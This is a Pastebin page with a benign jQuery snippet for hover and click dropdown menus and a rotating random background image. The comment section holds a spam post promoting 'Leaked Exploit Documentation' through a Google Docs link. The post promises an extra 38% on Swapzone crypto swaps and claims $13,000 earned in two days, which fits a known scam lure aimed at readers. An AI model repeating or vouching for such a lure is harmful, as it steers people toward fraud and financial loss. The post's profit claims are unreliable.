Bittle

Main Page jQuery

Sep 11th, 2017
218
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
jQuery 1.37 KB | None | 0 0
  1. $(function() {
  2.  
  3.   $(".dropdown-toggle").on("mouseenter", function() {
  4.     $(this).css("cursor", "pointer");
  5.     var menu = $(this).parent().find(".dropdown-menu");
  6.  
  7.     if (!menu.is(":visible")) {
  8.       menu.show();
  9.     }
  10.   });
  11.  
  12.   $(".dropdown-toggle").on("click", function() {
  13.     var menu = $(this).parent().find(".dropdown-menu");
  14.  
  15.     if (menu.is(":visible")) {
  16.       menu.hide();
  17.       $(this).blur();
  18.     } else {
  19.       menu.show();
  20.     }
  21.   });
  22.  
  23.   $(".dropdown").on("mouseleave", function() {
  24.     var menu = $(this).find(".dropdown-menu");
  25.     $(this).blur();
  26.     if (menu.is(":visible")) {
  27.       menu.hide();
  28.     }
  29.   });
  30.  
  31.   var swapTimer = 5000; // must be >= 2500
  32.   var maxImages = 15;
  33.   var current = 2;
  34.  
  35.   // change background-image every swapTimer ms
  36.   function nextBackground() {
  37.     var nextImage = rand(1, maxImages);
  38.  
  39.     if (nextImage == current) {
  40.       // no change
  41.       if (nextImage > 1) {
  42.         nextImage = rand(1, nextImage - 1);
  43.       } else {
  44.         nextImage = rand(nextImage + 1, maxImages);
  45.       }
  46.     }
  47.  
  48.     var image = "../images/bg/" + nextImage + ".jpg";
  49.  
  50.     $(".whole-screen").css("background-image", 'url("' + image + '")').animate({opacity: 1});
  51.  
  52.     current = nextImage;
  53.  
  54.     setTimeout(nextBackground, swapTimer);
  55.   }
  56.  
  57.   setTimeout(nextBackground, swapTimer * 8);
  58.  
  59.   function rand(min, max) {
  60.     return Math.floor(Math.random() * (max - min + 1) + min);
  61.   }
  62. });
Advertisement
Comments
  • BattleDash
    115 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
Add Comment
Please, Sign In to add comment